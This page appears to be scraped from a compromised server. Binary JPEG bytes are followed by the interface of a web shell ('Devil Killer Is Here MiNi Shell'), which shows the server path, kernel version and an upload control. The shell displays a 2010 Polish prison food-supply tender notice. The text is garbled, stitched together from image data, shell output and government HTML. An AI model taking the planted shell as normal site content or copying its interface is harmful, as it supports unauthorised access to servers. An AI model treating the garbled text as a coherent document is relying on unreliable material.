JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100708/201448-N-2010.html

<p class="kh_header"><b>Koronowo: Dostawa artykułów spożywczych różnych</b><br>
<b>Numer ogłoszenia: 201448 - 2010; data zamieszczenia: 08.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Koronowie , ul. Bydgoska 27, 86-010 Koronowo, woj. kujawsko-pomorskie, tel. 0 52 382 22 11, faks 0 52 382 09 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych różnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Grupa 1:

1.Marchew mrożona krojona w kostkę - 2 500 kg,( ilość szacunkowa ) (opakowanie zbiorcze 5 - 20 kg), nomenklatura CPV: 15331170-9, PN-A-78600:1992
2. Mieszanka warzywna 5-składnikowa (zawartość podstawowych rodzajów warzyw: marchew, brokuły, kalafior, por, seler) - 2 000 kg ( ilość szacunkowa ), (opakowanie zbiorcze 5 - 20 kg), nomenklatura CPV: 15331170-9, PN-A-78608:1997
3. Mieszanka warzywna 7-składnikowa  (ilość szacunkowa)  -  3 500 kg, (opakowanie zbiorcze 5 - 20 kg), nomenklatura CPV: 15331170-9, PN-A-78608:1997

Grupa 2:

1. Sałatka obiadowa - 3 000 kg,( ilość szacunkowa ) (opakowania 800 - 1 000 g), nomenklatura CPV: 15331000-7, PN-A-77750:1997
2. Sałatka szwedzka - 2 000 kg, ( ilość szacunkowa ) (opakowania 800 - 1 000 g), nomenklatura CPV: 15331000-7, PN-A-77750:1997
3. Groszek konserwowy - 2 000 kg ( ilość szacunkowa ) (opakowania 400 g), nomenklatura CPV: 15331462-3, PN-76A-77803
4. Marchew kostka - 1 500 kg, ( ilość szacunkowa ) (opakowania 800 - 4 800 g), nomenklatura CPV: 15331000-7, PN-A-75054:1997
5. Koncentrat pomidorowy 30 % - 1 300 kg,( ilość szacunkowa ) (opakowania 800 - 4 800 g), nomenklatura CPV: 15331427-6, PN-75A-77601

Grupa 3:

1. Kapusta kiszona z dodatkiem marchwi, drobno szatkowana, o swoistym smaku i zapachu - 7 000 kg,( ilość szacunkowa ) (pakowana w beczki plastikowe 80 - 120 kg), nomenklatura CPV:15331142-4, PN-72A-77700:2006
2. Ogórki kiszone o swoistym zapachu i smaku - 4 000 kg, ( ilość szacunkowa ) (pakowana w beczki plastikowe 80 - 120 kg), nomenklatura CPV: 15331000-7, PN-A-77701:1997


Grupa 4: 

1. Dżem wieloowocowy - 3 000 kg ( ilość szacunkowa ), (pakowany w opak. powyżej 5 kg), nomenklatura CPV: 15332290- 3, PN-A-75100:1994Az1:2000
2.  Dżem truskawkowy - 2 000 kg ( ilość szacunkowa ) (pakowany w opak. powyżej 5 kg), nomenklatura CPV: 15332296-5, PN-A-75100:1994Az1:2000
3. Marmolada wieloowocowa o konsystencji twardej - 6 000 kg, ( ilość szacunkowa ) (pakowana w opak. powyżej 5 kg), nomenklatura CPV:15332230-5, PN-A-75103:1993

Grupa 5:

1. Olej roślinny - 1 300 l,( ilość szacunkowa ) (opak. zbiorcze 1 - 3 l), nomenklatura CPV: 15411100-3, PN-A-86908:2000
2. Margaryna do smarowania pieczywa - 13 000 kg,( ilość szacunkowa ) (opak. zbiorcze 500 g), nomenklatura CPV: 15431100-9, PN-92A-86907

Grupa 6:

1. Soja granulat -500 kg, ( ilość szacunkowa ) (opak. zbiorcze 4-20 kg), nomenklatura CPV: 15890000-3, PN-ISO -5506
2. Kostka sojowa - 400 kg, ( ilość szacunkowa ) (opak. zbiorcze 4-20 kg), nomenklatura CPV: 15890000-3, PN-ISO -5506
3. Kotlet sojowy ( gramatura 1 szt. od 15-20 g ) -500 kg, ( ilość szacunkowa ) (opak. zbiorcze 4-20 kg), nomenklatura CPV: 15890000-3, PN-ISO -5506

Grupa 7:

1. Woda mineralna niegazowana w butelkach 1,5 l- 2 500 litrów, ( ilość szacunkowa ) nomenklatura CPV: 15981000-8, PN-Z-11001:1999,

Grupa 8:

1. kasza manna - 900 kg, ( ilość szacunkowa ) (opakowanie papierowe 5-25 kg ), nomenklatura CPV:15613000-8,PN-A -88A-74036
2.  kasza jęczmienna - 2 200 kg, ( ilość szacunkowa ) (opakowanie sizalowe  5-25 kg ),  nomenklatura CPV: 	15613000-8,    	PN-87A--74203
3. mąka pszenna typ 500 - 3 500 kg, ( ilość szacunkowa ) (opakowanie papierowe 5-25 kg), nomenklatura  CPV:15612100-2, PN-A-74022:2003
4. mąka ziemniaczana - 400 kg, ( ilość szacunkowa ) (opakowanie papierowe 5-25 kg) nomenklatura CPV:15620000-0, 	PN-93A-74710
5. ryż długoziarnisty -3 000 kg, ( ilość szacunkowa ) (opakowanie papierowe 5-25 kg) nomenklatura CPV: 15614100-6, 	PN-A-74220
6. płatki owsiane typu górskie - 800 kg, ( ilość szacunkowa ), (opakowanie papierowe 5-25 kg) nomenklatura CPV:15613380-5, PN-82A-74037.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.33.11.70-9, 15.33.11.70-9, 15.33.10.00-7, 15.33.10.00-7, 15.33.14.62-3, 15.33.10.00-1, 15.33.14.27-6, 15.33.11.42-4, 15.33.10.00-7, 15.33.22.90-3, 15.33.22.96-5, 15.33.22.30-5, 15.41.11.00-3, 15.43.11.00-9, 15.89.00.00-3, 15.89.00.00-3, 15.89.00.00-3, 15.98.10.00-8, 15.61.30.00-8, 15.61.30.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2.Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj.
1)podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2.Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj. 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2.Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj. 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2.Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj. 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2.Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj. 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Koronowo
ul. Bydgoska 27
86-010 Koronowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2010 godzina 11:00, miejsce: Zakład Karny Koronowo
ul. Bydgoska 27
86-010 Koronowo
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Marchew mrożona krojona w kostkę - 2 500 kg,( ilość szacunkowa ) (opakowanie zbiorcze 5 - 20 kg), nomenklatura CPV: 15331170-9, PN-A-78600:1992
2. Mieszanka warzywna 5-składnikowa (zawartość podstawowych rodzajów warzyw: marchew, brokuły, kalafior, por, seler) - 2 000 kg ( ilość szacunkowa ), (opakowanie zbiorcze 5 - 20 kg), nomenklatura CPV: 15331170-9, PN-A-78608:1997
3. Mieszanka warzywna 7-składnikowa  (ilość szacunkowa)  -  3 500 kg, (opakowanie zbiorcze 5 - 20 kg), nomenklatura CPV: 15331170-9, PN-A-78608:1997.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.33.11.70-9, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Sałatka obiadowa - 3 000 kg,( ilość szacunkowa ) (opakowania 800 - 1 000 g), nomenklatura CPV: 15331000-7, PN-A-77750:1997
2. Sałatka szwedzka - 2 000 kg, ( ilość szacunkowa ) (opakowania 800 - 1 000 g), nomenklatura CPV: 15331000-7, PN-A-77750:1997
3. Groszek konserwowy - 2 000 kg ( ilość szacunkowa ) (opakowania 400 g), nomenklatura CPV: 15331462-3, PN-76/A-77803
4. Marchew kostka - 1 500 kg, ( ilość szacunkowa ) (opakowania 800 - 4 800 g), nomenklatura CPV: 15331000-7, PN-A-75054:1997
5. Koncentrat pomidorowy 30 % - 1 300 kg,( ilość szacunkowa ) (opakowania 800 - 4 800 g), nomenklatura CPV: 15331427-6, PN-75/A-77601.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.10.00-7, 15.33.10.00-7, 15.33.14.62-3, 15.33.10.00-7, 15.33.14.27-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> grupa 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 3:

1. Kapusta kiszona z dodatkiem marchwi, drobno szatkowana, o swoistym smaku i zapachu - 7 000 kg,( ilość szacunkowa ) (pakowana w beczki plastikowe 80 - 120 kg), nomenklatura CPV:15331142-4, PN-72/A-77700:2006
2. Ogórki kiszone o swoistym zapachu i smaku - 4 000 kg, ( ilość szacunkowa ) (pakowana w beczki plastikowe 80 - 120 kg), nomenklatura CPV: 15331000-7, PN-/A-77701:1997.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.42-4, 15.33.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> grupa 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 4: 

1. Dżem wieloowocowy - 3 000 kg ( ilość szacunkowa ), (pakowany w opak. powyżej 5 kg), nomenklatura CPV: 15332290- 3, PN-A-75100:1994/Az1:2000
2.  Dżem truskawkowy - 2 000 kg ( ilość szacunkowa ) (pakowany w opak. powyżej 5 kg), nomenklatura CPV: 15332296-5, PN-A-75100:1994/Az1:2000
3. Marmolada wieloowocowa o konsystencji twardej - 6 000 kg, ( ilość szacunkowa ) (pakowana w opak. powyżej 5 kg), nomenklatura CPV:15332230-5, PN-A-75103:1993.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.90-3, 15.33.22.96-5, 15.33.22.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> grupa 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Olej roślinny - 1 300 l,( ilość szacunkowa ) (opak. zbiorcze 1 - 3 l), nomenklatura CPV: 15411100-3, PN-A-86908:2000
2. Margaryna do smarowania pieczywa - 13 000 kg,( ilość szacunkowa ) (opak. zbiorcze 500 g), nomenklatura CPV: 15431100-9, PN-92/A-86907.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.11.00-3, 15.43.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> grupa 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Soja granulat -500 kg, ( ilość szacunkowa ) (opak. zbiorcze 4-20 kg), nomenklatura CPV: 15890000-3, PN-ISO -5506
2. Kostka sojowa - 400 kg, ( ilość szacunkowa ) (opak. zbiorcze 4-20 kg), nomenklatura CPV: 15890000-3, PN-ISO -5506
3. Kotlet sojowy ( gramatura 1 szt. od 15-20 g ) -500 kg, ( ilość szacunkowa ) (opak. zbiorcze 4-20 kg), nomenklatura CPV: 15890000-3, PN-ISO -5506.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3, 15.89.00.00-3, 15.89.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> grupa 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Woda mineralna niegazowana w butelkach 1,5 l- 2 500 litrów, ( ilość szacunkowa ) nomenklatura CPV: 15981000-8, PN-Z-11001:1999,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> grupa 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. kasza manna - 900 kg, ( ilość szacunkowa ) (opakowanie papierowe 5-25 kg ), nomenklatura CPV:15613000-8,PN-A -88/A-74036
2.  kasza jęczmienna - 2 200 kg, ( ilość szacunkowa ) (opakowanie sizalowe  5-25 kg ),  nomenklatura CPV: 15613000-8,  PN-87/A--74203
3. mąka pszenna typ 500 - 3 500 kg, ( ilość szacunkowa ) (opakowanie papierowe 5-25 kg), nomenklatura  CPV:15612100-2, PN-A-74022:2003
4. mąka ziemniaczana - 400 kg, ( ilość szacunkowa ) (opakowanie papierowe 5-25 kg) nomenklatura CPV:15620000-0, PN-93/A-74710
5. ryż długoziarnisty -3 000 kg, ( ilość szacunkowa ) (opakowanie papierowe 5-25 kg) nomenklatura CPV: 15614100-6, PN-A-74220
6. płatki owsiane typu górskie - 800 kg, ( ilość szacunkowa ), (opakowanie papierowe 5-25 kg) nomenklatura CPV:15613380-5, PN-82/A-74037.</p></li>
